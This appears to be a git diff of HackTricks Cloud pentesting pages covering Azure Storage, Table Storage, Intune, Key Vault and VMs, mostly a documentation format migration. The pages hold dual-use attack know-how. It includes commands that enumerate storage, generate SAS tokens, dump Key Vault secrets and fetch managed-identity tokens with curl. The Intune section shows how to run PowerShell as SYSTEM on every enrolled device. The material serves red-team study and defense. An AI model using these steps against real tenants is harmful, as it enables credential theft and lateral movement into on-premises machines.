+- **Require secure transfer for REST API operations**: Require TLS in any communication with the storage +- **Allows enabling anonymous access on individual containers**: If not, it won't be possible to enable anonymous access in the future +- **Enable storage account key access**: If not, access with Shared Keys will be forbidden +- **Minimum TLS version** +- **Permitted scope for copy operations**: Allow from any storage account, from any storage account from the same Entra tenant or from storage account with private endpoints in the same virtual network. **Blob Storage options**: -* **Allow cross-tenant replication** -* **Access tier**: Hot (frequently access data), Cool and Cold (rarely accessed data) +- **Allow cross-tenant replication** +- **Access tier**: Hot (frequently access data), Cool and Cold (rarely accessed data) **Networking options**: -* **Network access**: - * Allow from all networks - * Allow from selected virtual networks and IP addresses - * Disable public access and use private access -* **Private endpoints**: It allows a private connection to the storage account from a virtual network +- **Network access**: + - Allow from all networks + - Allow from selected virtual networks and IP addresses + - Disable public access and use private access +- **Private endpoints**: It allows a private connection to the storage account from a virtual network **Data protection options**: -* **Point-in-time restore for containers**: Allows to restore containers to an earlier state - * It requires versioning, change feed, and blob soft delete to be enabled. 
-* **Enable soft delete for blobs**: It enables a retention period in days for deleted blobs (even overwritten) -* **Enable soft delete for containers**: It enables a retention period in days for deleted containers -* **Enable soft delete for file shares**: It enables a retention period in days for deleted file shared -* **Enable versioning for blobs**: Maintain previous versions of your blobs -* **Enable blob change feed**: Keep logs of create, modification, and delete changes to blobs -* **Enable version-level immutability support**: Allows you to set time-based retention policy on the account-level that will apply to all blob versions. - * Version-level immutability support and point-in-time restore for containers cannot be enabled simultaneously. +- **Point-in-time restore for containers**: Allows to restore containers to an earlier state + - It requires versioning, change feed, and blob soft delete to be enabled. +- **Enable soft delete for blobs**: It enables a retention period in days for deleted blobs (even overwritten) +- **Enable soft delete for containers**: It enables a retention period in days for deleted containers +- **Enable soft delete for file shares**: It enables a retention period in days for deleted file shared +- **Enable versioning for blobs**: Maintain previous versions of your blobs +- **Enable blob change feed**: Keep logs of create, modification, and delete changes to blobs +- **Enable version-level immutability support**: Allows you to set time-based retention policy on the account-level that will apply to all blob versions. + - Version-level immutability support and point-in-time restore for containers cannot be enabled simultaneously. 
**Encryption configuration options**: -* **Encryption type**: It's possible to use Microsoft-managed keys (MMK) or Customer-managed keys (CMK) -* **Enable infrastructure encryption**: Allows to double encrypt the data "for more security" +- **Encryption type**: It's possible to use Microsoft-managed keys (MMK) or Customer-managed keys (CMK) +- **Enable infrastructure encryption**: Allows to double encrypt the data "for more security" ### Storage endpoints @@ -72,9 +59,9 @@ Azure Storage Accounts are fundamental services in Microsoft Azure that provide If "Allow Blob public access" is **enabled** (disabled by default), when creating a container it's possible to: -* Give **public access to read blobs** (you need to know the name). -* **List container blobs** and **read** them. -* Make it fully **private** +- Give **public access to read blobs** (you need to know the name). +- **List container blobs** and **read** them. +- Make it fully **private**
@@ -92,61 +79,59 @@ It's possible to use Entra ID principals with **RBAC roles** to access storage a
 The storage accounts have access keys that can be used to access it. This provides f**ull access to the storage account.**
-
+
 ### **Shared Keys & Lite Shared Keys**
 It's possible to [**generate Shared Keys**](https://learn.microsoft.com/en-us/rest/api/storageservices/authorize-with-shared-key) signed with the access keys to authorize access to certain resources via a signed URL.
-{% hint style="info" %}
-Note that the `CanonicalizedResource` part represents the storage services resource (URI). And if any part in the URL is encoded, it should also be encoded inside the `CanonicalizedResource`.
-{% endhint %}
+> [!NOTE]
+> Note that the `CanonicalizedResource` part represents the storage services resource (URI). And if any part in the URL is encoded, it should also be encoded inside the `CanonicalizedResource`.
-{% hint style="info" %}
-This is **used by default by `az` cli** to authenticate requests. To make it use the Entra ID principal credentials indicate the param `--auth-mode login`.
-{% endhint %}
+> [!NOTE]
+> This is **used by default by `az` cli** to authenticate requests. To make it use the Entra ID principal credentials indicate the param `--auth-mode login`.
-* It's possible to generate a **shared key for blob, queue and file services** signing the following information: +- It's possible to generate a **shared key for blob, queue and file services** signing the following information: ```bash -StringToSign = VERB + "\n" + - Content-Encoding + "\n" + - Content-Language + "\n" + - Content-Length + "\n" + - Content-MD5 + "\n" + - Content-Type + "\n" + - Date + "\n" + - If-Modified-Since + "\n" + - If-Match + "\n" + - If-None-Match + "\n" + - If-Unmodified-Since + "\n" + - Range + "\n" + - CanonicalizedHeaders + +StringToSign = VERB + "\n" + + Content-Encoding + "\n" + + Content-Language + "\n" + + Content-Length + "\n" + + Content-MD5 + "\n" + + Content-Type + "\n" + + Date + "\n" + + If-Modified-Since + "\n" + + If-Match + "\n" + + If-None-Match + "\n" + + If-Unmodified-Since + "\n" + + Range + "\n" + + CanonicalizedHeaders + CanonicalizedResource; ``` -* It's possible to generate a **shared key for table services** signing the following information: +- It's possible to generate a **shared key for table services** signing the following information: ```bash StringToSign = VERB + "\n" + Content-MD5 + "\n" + - Content-Type + "\n" + - Date + "\n" + + Content-Type + "\n" + + Date + "\n" + CanonicalizedResource; ``` -* It's possible to generate a **lite shared key for blob, queue and file services** signing the following information: +- It's possible to generate a **lite shared key for blob, queue and file services** signing the following information: ```bash -StringToSign = VERB + "\n" + - Content-MD5 + "\n" + - Content-Type + "\n" + - Date + "\n" + - CanonicalizedHeaders + +StringToSign = VERB + "\n" + + Content-MD5 + "\n" + + Content-Type + "\n" + + Date + "\n" + + CanonicalizedHeaders + CanonicalizedResource; ``` -* It's possible to generate a **lite shared key for table services** signing the following information: +- It's possible to generate a **lite shared key for table services** signing the following information: 
```bash
 StringToSign = Date + "\n"
@@ -160,10 +145,10 @@ Authorization="[SharedKey|SharedKeyLite] :"
 #e.g.
 Authorization: SharedKey myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08=
-PUT http://myaccount/mycontainer?restype=container&timeout=30 HTTP/1.1
- x-ms-version: 2014-02-14
- x-ms-date: Fri, 26 Jun 2015 23:39:12 GMT
- Authorization: SharedKey myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08=
+PUT http://myaccount/mycontainer?restype=container&timeout=30 HTTP/1.1
+ x-ms-version: 2014-02-14
+ x-ms-date: Fri, 26 Jun 2015 23:39:12 GMT
+ Authorization: SharedKey myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08=
 Content-Length: 0
 ```
@@ -173,30 +158,30 @@ Shared Access Signatures (SAS) are secure, time-limited URLs that **grant specif #### SAS Types -* **User delegation SAS**: This is created from an **Entra ID principal** which will sign the SAS and delegate the permissions from the user to the SAS. It can only be used with **blob and data lake storage** ([docs](https://learn.microsoft.com/en-us/rest/api/storageservices/create-user-delegation-sas)). It's possible to **revoke** all generated user delegated SAS. - * Even if it's possible to generate a delegation SAS with "more" permissions than the ones the user has. However, if the principal doesn't have them, it won't work (no privesc). -* **Service SAS**: This is signed using one of the storage account **access keys**. It can be used to grant access to specific resources in a single storage service. If the key is renewed, the SAS will stop working. -* **Account SAS**: It's also signed with one of the storage account **access keys**. It grants access to resources across a storage account services (Blob, Queue, Table, File) and can include service-level operations. +- **User delegation SAS**: This is created from an **Entra ID principal** which will sign the SAS and delegate the permissions from the user to the SAS. It can only be used with **blob and data lake storage** ([docs](https://learn.microsoft.com/en-us/rest/api/storageservices/create-user-delegation-sas)). It's possible to **revoke** all generated user delegated SAS. + - Even if it's possible to generate a delegation SAS with "more" permissions than the ones the user has. However, if the principal doesn't have them, it won't work (no privesc). +- **Service SAS**: This is signed using one of the storage account **access keys**. It can be used to grant access to specific resources in a single storage service. If the key is renewed, the SAS will stop working. +- **Account SAS**: It's also signed with one of the storage account **access keys**. 
It grants access to resources across a storage account services (Blob, Queue, Table, File) and can include service-level operations. A SAS URL signed by an **access key** looks like this: -* `https://.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D` +- `https://.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D` A SAS URL signed as a **user delegation** looks like this: -* `https://.blob.core.windows.net/testing-container?sp=r&st=2024-11-22T15:07:40Z&se=2024-11-22T23:07:40Z&skoid=d77c71a1-96e7-483d-bd51-bd753aa66e62&sktid=fdd066e1-ee37-49bc-b08f-d0e152119b04&skt=2024-11-22T15:07:40Z&ske=2024-11-22T23:07:40Z&sks=b&skv=2022-11-02&spr=https&sv=2022-11-02&sr=c&sig=7s5dJyeE6klUNRulUj9TNL0tMj2K7mtxyRc97xbYDqs%3D` +- `https://.blob.core.windows.net/testing-container?sp=r&st=2024-11-22T15:07:40Z&se=2024-11-22T23:07:40Z&skoid=d77c71a1-96e7-483d-bd51-bd753aa66e62&sktid=fdd066e1-ee37-49bc-b08f-d0e152119b04&skt=2024-11-22T15:07:40Z&ske=2024-11-22T23:07:40Z&sks=b&skv=2022-11-02&spr=https&sv=2022-11-02&sr=c&sig=7s5dJyeE6klUNRulUj9TNL0tMj2K7mtxyRc97xbYDqs%3D` Note some **http params**: -* The **`se`** param indicates the **expiration date** of the SAS -* The **`sp`** param indicates the **permissions** of the SAS -* The **`sig`** is the **signature** validating the SAS +- The **`se`** param indicates the **expiration date** of the SAS +- The **`sp`** param indicates the **permissions** of the SAS +- The **`sig`** is the **signature** validating the SAS #### SAS permissions When generating a SAS it's needed to indicate the permissions that it should be granting. Depending on the objet the SAS is being generated over different permissions might be included. 
For example: -* (a)dd, (c)reate, (d)elete, (e)xecute, (f)ilter\_by\_tags, (i)set\_immutability\_policy, (l)ist, (m)ove, (r)ead, (t)ag, (w)rite, (x)delete\_previous\_version, (y)permanent\_delete +- (a)dd, (c)reate, (d)elete, (e)xecute, (f)ilter_by_tags, (i)set_immutability_policy, (l)ist, (m)ove, (r)ead, (t)ag, (w)rite, (x)delete_previous_version, (y)permanent_delete ## SFTP Support for Azure Blob Storage @@ -206,8 +191,8 @@ Azure Blob Storage now supports the SSH File Transfer Protocol (SFTP), enabling - Protocol Support: SFTP works with Blob Storage accounts configured with hierarchical namespace (HNS). This organizes blobs into directories and subdirectories for easier navigation. - Security: SFTP uses local user identities for authentication and does not integrate with RBAC or ABAC. Each local user can authenticate via: - - Azure-generated passwords - - Public-private SSH key pairs + - Azure-generated passwords + - Public-private SSH key pairs - Granular Permissions: Permissions such as Read, Write, Delete, and List can be assigned to local users for up to 100 containers. - Networking Considerations: SFTP connections are made through port 22. Azure supports network configurations like firewalls, private endpoints, or virtual networks to secure SFTP traffic. 
@@ -216,27 +201,27 @@ Azure Blob Storage now supports the SSH File Transfer Protocol (SFTP), enabling - Hierarchical Namespace: HNS must be enabled when creating the storage account. - Supported Encryption: Requires Microsoft Security Development Lifecycle (SDL)-approved cryptographic algorithms (e.g., rsa-sha2-256, ecdsa-sha2-nistp256). - SFTP Configuration: - - Enable SFTP on the storage account. - - Create local user identities with appropriate permissions. - - Configure home directories for users to define their starting location within the container. + - Enable SFTP on the storage account. + - Create local user identities with appropriate permissions. + - Configure home directories for users to define their starting location within the container. ### Permissions -| Permission | Symbol | Description | -|-------------------|--------|--------------------------------------------| -| **Read** | `r` | Read file content. | -| **Write** | `w` | Upload files and create directories. | -| **List** | `l` | List contents of directories. | -| **Delete** | `d` | Delete files or directories. | -| **Create** | `c` | Create files or directories. | -| **Modify Ownership** | `o` | Change the owning user or group. | -| **Modify Permissions** | `p` | Change ACLs on files or directories. | +| Permission | Symbol | Description | +| ---------------------- | ------ | ------------------------------------ | +| **Read** | `r` | Read file content. | +| **Write** | `w` | Upload files and create directories. | +| **List** | `l` | List contents of directories. | +| **Delete** | `d` | Delete files or directories. | +| **Create** | `c` | Create files or directories. | +| **Modify Ownership** | `o` | Change the owning user or group. | +| **Modify Permissions** | `p` | Change ACLs on files or directories. 
| ## Enumeration -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="az cli" }} + ```bash # Get storage accounts az storage account list #Get the account name from here @@ -320,7 +305,7 @@ az storage generate-sas \ --account-name \ --as-user --auth-mode login \ -n - + ## Generate account SAS az storage account generate-sas \ --expiry 2024-12-31T23:59:00Z \ @@ -353,11 +338,11 @@ az storage account local-user list \ --account-name \ --resource-group ``` -{% endcode %} -{% endtab %} -{% tab title="Az PowerShell" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="Az PowerShell" }} + ```powershell # Get storage accounts Get-AzStorageAccount | fl 
@@ -415,51 +400,38 @@ New-AzStorageBlobSASToken ` -Permission racwdl ` -ExpiryTime (Get-Date "2024-12-31T23:59:00Z") ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ### File Shares -{% content-ref url="az-file-shares.md" %} -[az-file-shares.md](az-file-shares.md) -{% endcontent-ref %} +{{#ref}} +az-file-shares.md +{{#endref}} ## Privilege Escalation -{% content-ref url="../az-privilege-escalation/az-storage-privesc.md" %} -[az-storage-privesc.md](../az-privilege-escalation/az-storage-privesc.md) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-storage-privesc.md +{{#endref}} ## Post Exploitation -{% content-ref url="../az-post-exploitation/az-blob-storage-post-exploitation.md" %} -[az-blob-storage-post-exploitation.md](../az-post-exploitation/az-blob-storage-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../az-post-exploitation/az-blob-storage-post-exploitation.md +{{#endref}} ## Persistence -{% content-ref url="../az-persistence/az-storage-persistence.md" %} -[az-storage-persistence.md](../az-persistence/az-storage-persistence.md) -{% endcontent-ref %} +{{#ref}} +../az-persistence/az-storage-persistence.md +{{#endref}} ## References -* [https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction](https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction) -* [https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview](https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview) -* [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support) +- [https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction](https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction) +- 
[https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview](https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview) +- [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-services/az-table-storage.md b/src/pentesting-cloud/azure-security/az-services/az-table-storage.md new file mode 100644 index 000000000..33e727ab4 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-services/az-table-storage.md 
@@ -0,0 +1,109 @@ +# Az - Table Storage + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +**Azure Table Storage** is a NoSQL key-value store designed for storing large volumes of structured, non-relational data. It offers high availability, low latency, and scalability to handle large datasets efficiently. Data is organized into tables, with each entity identified by a partition key and row key, enabling fast lookups. It supports features like encryption at rest, role-based access control, and shared access signatures for secure, managed storage suitable for a wide range of applications. + +There **isn't built-in backup mechanism** for table storage. + +### Keys + +#### **PartitionKey** + +- The **PartitionKey groups entities into logical partitions**. Entities with the same PartitionKey are stored together, which improves query performance and scalability. +- Example: In a table storing employee data, `PartitionKey` might represent a department, e.g., `"HR"` or `"IT"`. + +#### **RowKey** + +- The **RowKey is the unique identifier** for an entity within a partition. When combined with the PartitionKey, it ensures that each entity in the table has a globally unique identifier. +- Example: For the `"HR"` partition, `RowKey` might be an employee ID, e.g., `"12345"`. + +#### **Other Properties (Custom Properties)** + +- Besides the PartitionKey and RowKey, an entity can have additional **custom properties to store data**. These are user-defined and act like columns in a traditional database. +- Properties are stored as **key-value pairs**. +- Example: `Name`, `Age`, `Title` could be custom properties for an employee. 
+ +## Enumeration + +{{#tabs}} +{{#tab name="az cli"}} + +```bash +# Get storage accounts +az storage account list + +# List tables +az storage table list --account-name + +# Read table +az storage entity query \ + --account-name \ + --table-name \ + --top 10 + +# Write table +az storage entity insert \ + --account-name \ + --table-name \ + --entity PartitionKey= RowKey= = + +# Write example +az storage entity insert \ + --account-name mystorageaccount \ + --table-name mytable \ + --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" + +# Update row +az storage entity merge \ + --account-name mystorageaccount \ + --table-name mytable \ + --entity PartitionKey=pk1 RowKey=rk1 Age=31 +``` + +{{#endtab}} +{{#tab name="PowerShell"}} + +```powershell +# Get storage accounts +Get-AzStorageAccount + +# List tables +Get-AzStorageTable -Context (Get-AzStorageAccount -Name -ResourceGroupName ).Context +``` + +{{#endtab}} +{{#endtabs}} + +> [!NOTE] +> By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login`. + +> [!TIP] +> Use the param `--account-key` to indicate the account key to use\ +> Use the param `--sas-token` with the SAS token to access via a SAS token + +## Privilege Escalation + +Same as storage privesc: + +{{#ref}} +../az-privilege-escalation/az-storage-privesc.md +{{#endref}} + +## Post Exploitation + +{{#ref}} +../az-post-exploitation/az-table-storage-post-exploitation.md +{{#endref}} + +## Persistence + +Same as storage persistence: + +{{#ref}} +../az-persistence/az-storage-persistence.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-services/intune.md b/src/pentesting-cloud/azure-security/az-services/intune.md new file mode 100644 index 000000000..1f9181bb6 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-services/intune.md 
@@ -0,0 +1,31 @@ +# Az - Intune + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +Microsoft Intune is designed to streamline the process of **app and device management**. Its capabilities extend across a diverse range of devices, encompassing mobile devices, desktop computers, and virtual endpoints. The core functionality of Intune revolves around **managing user access and simplifying the administration of applications** and devices within an organization's network. + +## Cloud -> On-Prem + +A user with **Global Administrator** or **Intune Administrator** role can execute **PowerShell** scripts on any **enrolled Windows** device.\ +The **script** runs with **privileges** of **SYSTEM** on the device only once if it doesn't change, and from Intune it's **not possible to see the output** of the script. + +```powershell +Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'" +``` + +1. Login into [https://endpoint.microsoft.com/#home](https://endpoint.microsoft.com/#home) or use Pass-The-PRT +2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune +3. Go to **Scripts** and click on **Add** for Windows 10. +4. Add a **Powershell script** + - ![](<../../../images/image (264).png>) +5. Specify **Add all users** and **Add all devices** in the **Assignments** page. + +The execution of the script can take up to **one hour**. + +## References + +- [https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune](https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-services/keyvault.md b/src/pentesting-cloud/azure-security/az-services/keyvault.md similarity index 65% rename from pentesting-cloud/azure-security/az-services/keyvault.md rename to src/pentesting-cloud/azure-security/az-services/keyvault.md index f49f1fb4f..eca97c105 100644 
--- a/pentesting-cloud/azure-security/az-services/keyvault.md +++ b/src/pentesting-cloud/azure-security/az-services/keyvault.md @@ -1,19 +1,6 @@ # Az - Key Vault -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information 
@@ -27,31 +14,31 @@ The **URL format** for **vaults** is `https://{vault-name}.vault.azure.net/{obje Where: -* `vault-name` is the globally **unique** name of the key vault -* `object-type` can be "keys", "secrets" or "certificates" -* `object-name` is **unique** name of the object within the key vault -* `object-version` is system generated and optionally used to address a **unique version of an object**. +- `vault-name` is the globally **unique** name of the key vault +- `object-type` can be "keys", "secrets" or "certificates" +- `object-name` is **unique** name of the object within the key vault +- `object-version` is system generated and optionally used to address a **unique version of an object**. In order to access to the secrets stored in the vault it's possible to select between 2 permissions models when creating the vault: -* **Vault access policy** -* **Azure RBAC** (most common and recommended) - * You can find all the granular permissions supported in [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault) +- **Vault access policy** +- **Azure RBAC** (most common and recommended) + - You can find all the granular permissions supported in [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault) ### Access Control Access to a Key Vault resource is controlled by two planes: -* The **management plane**, whose target is [management.azure.com](http://management.azure.com/). - * It's used to manage the key vault and **access policies**. Only Azure role based access control (**RBAC**) is supported. -* The **data plane**, whose target is **`.vault.azure.com`**. 
- * It's used to manage and access the **data** (keys, secrets and certificates) **in the key vault**. This supports **key vault access policies** or Azure **RBAC**. +- The **management plane**, whose target is [management.azure.com](http://management.azure.com/). + - It's used to manage the key vault and **access policies**. Only Azure role based access control (**RBAC**) is supported. +- The **data plane**, whose target is **`.vault.azure.com`**. + - It's used to manage and access the **data** (keys, secrets and certificates) **in the key vault**. This supports **key vault access policies** or Azure **RBAC**. A role like **Contributor** that has permissions in the management place to manage access policies can get access to the secrets by modifying the access policies. ### Key Vault RBAC Built-In Roles -
+
### Network Access @@ -75,9 +62,9 @@ However, it's possible to create a vault with **purge protection disabled** whic ## Enumeration -{% tabs %} -{% tab title="az" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="az" }} + ```bash # List all Key Vaults in the subscription az keyvault list @@ -105,11 +92,11 @@ az keyvault secret show --vault-name --name # Get old versions secret value az keyvault secret show --id https://.vault.azure.net/secrets// ``` -{% endcode %} -{% endtab %} -{% tab title="Az Powershell" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="Az Powershell" }} + ```powershell # Get keyvault token curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER @@ -133,10 +120,11 @@ Get-AzKeyVault -VaultName -InRemovedState # Get secret values Get-AzKeyVaultSecret -VaultName -Name -AsPlainText ``` -{% endcode %} -{% endtab %} -{% tab title="az script" %} +{{#endtab }} + +{{#tab name="az script" }} + ```bash #!/bin/bash @@ -177,32 +165,20 @@ do done done ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ## Privilege Escalation -{% content-ref url="../az-privilege-escalation/az-key-vault-privesc.md" %} -[az-key-vault-privesc.md](../az-privilege-escalation/az-key-vault-privesc.md) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-key-vault-privesc.md +{{#endref}} ## Post Exploitation -{% content-ref url="../az-post-exploitation/az-key-vault-post-exploitation.md" %} -[az-key-vault-post-exploitation.md](../az-post-exploitation/az-key-vault-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../az-post-exploitation/az-key-vault-post-exploitation.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-services/vms/README.md b/src/pentesting-cloud/azure-security/az-services/vms/README.md similarity index 80% rename from pentesting-cloud/azure-security/az-services/vms/README.md rename to src/pentesting-cloud/azure-security/az-services/vms/README.md index ad081b59a..58e6c2afc 100644 --- a/pentesting-cloud/azure-security/az-services/vms/README.md +++ b/src/pentesting-cloud/azure-security/az-services/vms/README.md @@ -1,27 +1,14 @@ # Az - Virtual Machines & Network -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Azure Networking Basic Info Azure networks contains **different entities and ways to configure it.** You can find a brief **descriptions,** **examples** and **enumeration** commands of the different Azure network entities in: -{% content-ref url="az-azure-network.md" %} -[az-azure-network.md](az-azure-network.md) -{% endcontent-ref %} +{{#ref}} +az-azure-network.md +{{#endref}} ## VMs Basic information 
@@ -29,46 +16,46 @@ Azure Virtual Machines (VMs) are flexible, on-demand **cloud-based servers that ### Security Configurations -* **Availability Zones**: Availability zones are distinct groups of datacenters within a specific Azure region which are physically separated to minimize the risk of multiple zones being affected by local outages or disasters. -* **Security Type**: - * **Standard Security**: This is the default security type that does not require any specific configuration. - * **Trusted Launch**: This security type enhances protection against boot kits and kernel-level malware by using Secure Boot and Virtual Trusted Platform Module (vTPM). - * **Confidential VMs**: On top of a trusted launch, it offers hardware-based isolation between the VM, hypervisor and host management, improves the disk encryption and [**more**](https://learn.microsoft.com/en-us/azure/confidential-computing/confidential-vm-overview)**.** -* **Authentication**: By default a new **SSH key is generated**, although it's possible to use a public key or use a previous key and the username by default is **azureuser**. It's also possible to configure to use a **password.** -* **VM disk encryption:** The disk is encrypted at rest by default using a platform managed key. - * It's also possible to enable **Encryption at host**, where the data will be encrypted in the host before sending it to the storage service, ensuring an end-to-end encryption between the host and the storage service ([**docs**](https://learn.microsoft.com/en-gb/azure/virtual-machines/disk-encryption#encryption-at-host---end-to-end-encryption-for-your-vm-data)). 
-* **NIC network security group**: - * **None**: Basically opens every port - * **Basic**: Allows to easily open the inbound ports HTTP (80), HTTPS (443), SSH (22), RDP (3389) - * **Advanced**: Select a security group -* **Backup**: It's possible to enable **Standard** backup (one a day) and **Enhanced** (multiple per day) -* **Patch orchestration options**: This enable to automatically apply patches in the VMs according to the selected policy as described in the [**docs**](https://learn.microsoft.com/en-us/azure/virtual-machines/automatic-vm-guest-patching). -* **Alerts**: It's possible to automatically get alerts by email or mobile app when something happen in the VM. Default rules: - * Percentage CPU is greater than 80% - * Available Memory Bytes is less than 1GB - * Data Disks IOPS Consumed Percentage is greater than 95% - * OS IOPS Consumed Percentage is greater than 95% - * Network in Total is greater than 500GB - * Network Out Total is greater than 200GB - * VmAvailabilityMetric is less than 1 -* **Heath monitor**: By default check protocol HTTP in port 80 -* **Locks**: It allows to lock a VM so it can only be read (**ReadOnly** lock) or it can be read and updated but not deleted (**CanNotDelete** lock). - * Most VM related resources **also support locks** like disks, snapshots... - * Locks can also be applied at **resource group and subscription levels** +- **Availability Zones**: Availability zones are distinct groups of datacenters within a specific Azure region which are physically separated to minimize the risk of multiple zones being affected by local outages or disasters. +- **Security Type**: + - **Standard Security**: This is the default security type that does not require any specific configuration. + - **Trusted Launch**: This security type enhances protection against boot kits and kernel-level malware by using Secure Boot and Virtual Trusted Platform Module (vTPM). 
